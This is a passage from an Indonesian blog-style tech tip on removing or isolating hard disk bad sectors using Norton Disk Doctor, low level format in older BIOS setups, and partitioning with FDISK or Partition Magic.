Untuk pencegahan atau sebagai tindakan pertama yang sebaiknya kita lakukan jika sektor-sektor rusak ini telah menghiasi harddisk kita adalah dengan menggunakan software utility harddisk. Norton Disk Doctor buatan Symantec Corp adalah salah satu software yang bisa kita gunakan untuk mengatasi bad sector ini. Pada “Surface Scan” bad sector akan dianalisa (sektor rusak akan ditandai dengan blok berwarna hitam), dan aktifkan pilihan “Automatically Fix Errors” agar bad sector yang terdeteksi bisa langsung diperbaiki. Software Zerofill bisa juga kita gunakan, tapi software ini dibuat khusus hanya untuk digunakan pada harddisk buatan Quantum.

2.Format Harddisk

Jika alternatif pertama tidak manjur, maka cara yang paling ampuh untuk menghilangkan bad sector adalah dengan memformatnya. Format ulanglah harddisk Anda, tapi jangan gunakan high level format atau dari start up disk karena biasanya ini tidak mempan. Format yang paling sakti adalah dengan Low Level Format. Pada beberapa mainboard lama, dapat kita temukan fasilitas Low Level Format pada setup BIOSnya. BIOS dari Award Software termasuk salah satu yang menyertakan fasilitas Low Level Format ini. Masuklah ke setup BIOS lalu pilih Low Level Format dan jalankan Bad Sector/Track Analysis. Selanjutnya harddisk Anda akan dianalisa dan jika telah selesai maka Anda tinggal pilih Delete Bad Sector untuk menghapus bad sector-nya. Biasanya cara ini adalah cara yang paling ampuh. Bad sectornya langsung hilang tak berbekas.

3.Partisi Harddisk

Opsi terakhir yang bisa kita lakukan adalah mencegah bad sector ini agar tidak merambat ke sector lain. Untuk mencegah agar sektor ini tidak menjalar, maka kita harus mempartisi harddisk kita dan seluruh bad sector itu kita lokalisir pada satu bagian partisi harddisk. FDISK dan Power Quest Partition Magic adalah software yang bisa kita gunakan untuk mempartisi harddisk kita dan melokalisir bad sector pada satu partisi. Saran saya, gunakan saja Partition Magic, pada software ini cara mempartisinya lebih gampang karena ada petunjuk dan wizard-nya, di samping itu ada juga fasilitas bad sector retest untuk menganalisa bad sector. Ditambah lagi, partisi yang telah kita buat untuk melokalisir bad sector tadi bisa kita hidden atau mungkin didelete. Tapi bagi PC yang belum terinstal, maka FDISK bisa juga digunakan.
read more...